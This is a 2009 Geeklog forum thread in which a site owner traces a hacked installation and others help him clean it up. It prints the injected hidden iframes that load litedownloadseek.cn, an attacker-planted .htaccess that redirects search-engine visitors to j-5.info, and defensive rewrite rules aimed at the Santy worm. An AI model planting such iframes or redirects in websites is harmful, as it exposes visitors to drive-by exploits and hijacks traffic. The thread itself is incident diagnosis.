Posted on: 01/19/09 12:56pm
By: guganbl
I made gl 1.41 site to my friends in moto club , and on my great surprise now it has a virus!
I dont know how, i dont know so much about gl. but i need advice what to do......
When i open site kaspersky reports me :
1/19/2009 4:00:54 PM http://326g.com/forums/includes/hooks/system/index.php//index Internet Explorer Detected: Exploit.JS.Agent.aad
1/19/2009 4:00:54 PM http://326g.com/forums/includes/hooks/system/index.php//index Internet Explorer Denied: Exploit.JS.Agent.aad
1/19/2009 6:48:43 PM http://alink.belstom.ru/partners/system/index.php//index Internet Explorer Detected: Exploit.JS.Agent.aad
1/19/2009 6:48:43 PM http://alink.belstom.ru/partners/system/index.php//index Internet Explorer Denied: Exploit.JS.Agent.aad
I tried to disable all blocks and plugins but it is the same, and even google reports this site as blacklisted.
Any idea what to do and how to get rid of this stupid thing?
Theory of how is this possible would also help, since i i understend the problem i may be able to fix it.
Is it possible that someone with admin rights had virus on computer and virus migrated to gl somehow?
Thanx for help
Re: Virus in gl 1.41
Posted on: 01/19/09 02:25pm
By: Dirk
IIRC, there was a series of server breakins a while ago that left JavaScript code in websites. See if you can figure out where it was injected in your Geeklog install (start with the layout directory).
Feel free to contact us through our
security contact[*1] if you can't figure it out yourself.
bye, Dirk
Re: Virus in gl 1.41
Posted on: 01/20/09 08:06am
By: guganbl
Well i have checked in layout folder, i even tryed to replace all files ( made a backup of gl folder in march 2008 so i have all the original files) but it was the same......
I`m thinking about uploading backup from march folder and keeping mediagallery and articles folder from infected version. What do you think would it work ?
Re: Virus in gl 1.41
Posted on: 01/21/09 11:16am
By: guganbl
Found code in mediaglaery/index.php here it is :
?<html><body><iframe src="http://litedownloadseek.cn/in.cgi?cocacola19" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://litedownloadseek.cn/in.cgi?cocacola16" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://litedownloadseek.cn/in.cgi?cocacola17" width=1 height=1 style="visibility: hidden"></iframe></body></html>>
and in publichtml\index.php:
?><html><body><iframe src="http://litedownloadseek.cn/in.cgi?cocacola19" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://litedownloadseek.cn/in.cgi?cocacola16" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://litedownloadseek.cn/in.cgi?cocacola17" width=1 height=1 style="visibility: hidden"></iframe></body></html>
I removed these codes and now it seems ok , for now no report of virus....
\Site is on url:
http://www.banjalukasport.com/marshal/public_html/
So i dont know did it infiltreted more files , but for now i dont get any errors from kaspersky while browsing the site.
Question is how to prevent this from happening again?
Kind regards,
Sasa
Re: Virus in gl 1.41
Posted on: 01/21/09 11:24am
By: guganbl
Found the same stupid code in \forum\index.php
Re: Virus in gl 1.41
Posted on: 01/21/09 01:57pm
By: Laugh
Quote by: guganblFound the same stupid code in forumindex.php
Unless you know when the hack happened and can restore the files before that it is always best to delete all directories and to start with fresh files from the install packages.
Once you remove all infected files I believe you can use Google Webmaster Tools to contact Google to get your site off their blacklist.
Re: Virus in gl 1.41
Posted on: 01/21/09 06:35pm
By: guganbl
Huh, just wanted to go to google webmaster tools to report that site is ok , and found it again
Here is what happens.......
When i go to site thru this url :
http://www.banjalukasport.com/marshal/public_html/ , everithing is ok , no virus.
but if i go this way http://www.banjalukasport.com/marshal/ i get virus report and automatically something changes http://www.banjalukasport.com/marshal/public_html/index.php file , it adds a new line at the end of it.
This is more painful than i thought it will be
:shock:
Re: Virus in gl 1.41
Posted on: 01/21/09 06:43pm
By: guganbl
I write this much here since someone will have this problem and it will be easier to solve it.
Found it again, in index.pho in geeklog dir . So what i found until now is that all index.php files were infected. So it is safe to conclude that it has permissions to write to those files somehow.
Does anyone have the idea how to stop this from happening ?
I will now continue my SD mission
Re: Virus in gl 1.41
Posted on: 01/21/09 07:35pm
By: Anonymous (alway-guest)
Quote by: guganblI write this much here since someone will have this problem and it will be easier to solve it.
Found it again, in index.pho in geeklog dir . So what i found until now is that all index.php files were infected. So it is safe to conclude that it has permissions to write to those files somehow.
Does anyone have the idea how to stop this from happening ?
I will now continue my SD mission
no idea sir, because it happen only on your site. if other GL users have the same problem as you, they may report to GL headquarter already.
Re: Virus in gl 1.41
Posted on: 01/21/09 08:03pm
By: Laugh
Where those files always infected? Did you scan all text files for the code?
If you are using windows you can deny modify rights to your website files for your internet user guest account (the one used by IIS).
Re: Virus in gl 1.41
Posted on: 01/22/09 05:50am
By: guganbl
Hosting is on linux , and i have found virus code in every file that has a name index.php for example public_html\index.php , media gallery\inedx.php , calendar\index.php , etc........
For now it looks like i removed code from all files, but i dont know how did it get there , so it means that i will happen again.
Re: Virus in gl 1.41
Posted on: 01/23/09 06:26pm
By: Anonymous (govezone)
I too have the same problem described above and I'm hosting with Liquid Web. So they are affecting some kind of security whole I presume. The tech guys are looking into it as a write this. I'll post results once I figure it out.
Re: Virus in gl 1.41
Posted on: 01/23/09 07:11pm
By: guganbl
It happens again and again every time, i clean all files and after some times they are afected again. I really don`t know how is this possible ..... I`m hosted with Godaddy , and i`m gonna ask for their tech support also. Maybe it will help to figure out what is happening...... If you get any news please share , and i will do the same.
Regards
Sasa
Re: Virus in gl 1.41
Posted on: 01/23/09 07:32pm
By: guganbl
Just now found something strange i found file named .htaccess in gl root and in public_html
with this content:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://j-5.info/2/go.php?sid=2 [R,L]
These files were not here before as much as i remember but i dont know what this means , could this be a reason how someone can change my files ?
I know that this .htacces file in root of my hosting has something with permissions but i dont know what tese two files are doing in my gl ?
Re: Virus in gl 1.41
Posted on: 01/23/09 07:35pm
By: Chrispcritters
This sounds more like your hosting account has been compromised than a Geeklog issue. Have you checked your logs with your host? Have you changed your hosting account password?
Re: Virus in gl 1.41
Posted on: 01/23/09 07:38pm
By: guganbl
I`m gonna do that right now, and i wrote an e-mail to tech support for hosting...
Re: Virus in gl 1.41
Posted on: 01/23/09 07:57pm
By: guganbl
I think i know what the problem is , my original root .htaccess file also looks strange, but i dont have backup of old one, so i need some help to fix it. Here is what is inside :
# -FrontPage-
IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*
<Limit GET POST>
order deny,allow
deny from all
allow from all
</Limit>
<Limit PUT DELETE>
order deny,allow
deny from all
</Limit>
# attempts to stop the Santy worm
RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)wget%20 [OR]
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)highlight=%2527 [OR]
RewriteCond %{HTTP_USER_AGENT} lwp-trivial [NC,OR]
RewriteCond %{HTTP_COOKIE}% s
.*):%22test1%22%3b
RewriteRule ^.*$ http://127.0.0.1/ [L,R=301]
# Referrer spam :-(
RewriteCond %{HTTP_REFERER} ^http://.*hosting4u.gb.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^http://.*4free.gb.com.*$ [NC]
RewriteRule ^.*$ http://127.0.0.1/ [L,R=301]
ErrorDocument 404 /404.php
Redirect 403 /sport/config.php
Redirect 403 /buk/config.php
Redirect 403 /geeklog/config.php
Redirect 403 /marshal/config.php
At the end are dirs of my four gl sites, one of them i compromised for now , but how do i fix this file , please help :shock:
Re: Virus in gl 1.41
Posted on: 01/24/09 02:57am
By: Dirk
Sorry for not having the time to look into this earlier. Seems like you pretty much figured things out with the help of others already. I agree with Chrispitters (and said as much in my original response): This looks like your hosting account - or maybe even the entire server - has been compromised. You may want to contact your hosting service.
Quote by: guganblAt the end are dirs of my four gl sites, one of them i compromised for now , but how do i fix this file , please help :shock:
Geeklog itself doesn't really require a .htaccess file, so you could simply delete it.
Some of the rules you quoted look like they came from
this post[*2] . They can help reduce the server load but are not strictly necessary.
I'd say start over with a fresh .htaccess (once you know what actually happened and can be sure it won't happen again) and then add rules as you need them.
bye, Dirk
Re: Virus in gl 1.41
Posted on: 01/24/09 03:28pm
By: guganbl
I figured out almost everything, i still didn`t get answer from my hosting support ( it`s written that they will answer in 8 hours, but its more than 24 already ) and only thing that i`m not sure is this .htaccess file that i have ok.
So if you can look over it it would be great help, just to eliminate chance that there is error there.
Kind regards
:shakehands:
Re: Virus in gl 1.41
Posted on: 01/25/09 01:23pm
By: guganbl
Ok , here is conclusion , just to help in case someone else is in same kind of trouble :
Ftp account that had access to this infected gl installation was compromised . Person that used that account had virus on his computer and i guess that it send its secrets to somewhere.
Someone was clever enough to put .htmaccess file in gl folder and with that gained access to some gl files, and whenever i fix them they were soon infected again. So cure was to remove that .htmaccess file, to download gl directory to my computer and to scan it with antivirus software . Than look at the log of av and go file by file and remove virus code or replace file.
For now it worked, second day and no virus reported.
Thanx everyone for help
:shakehands: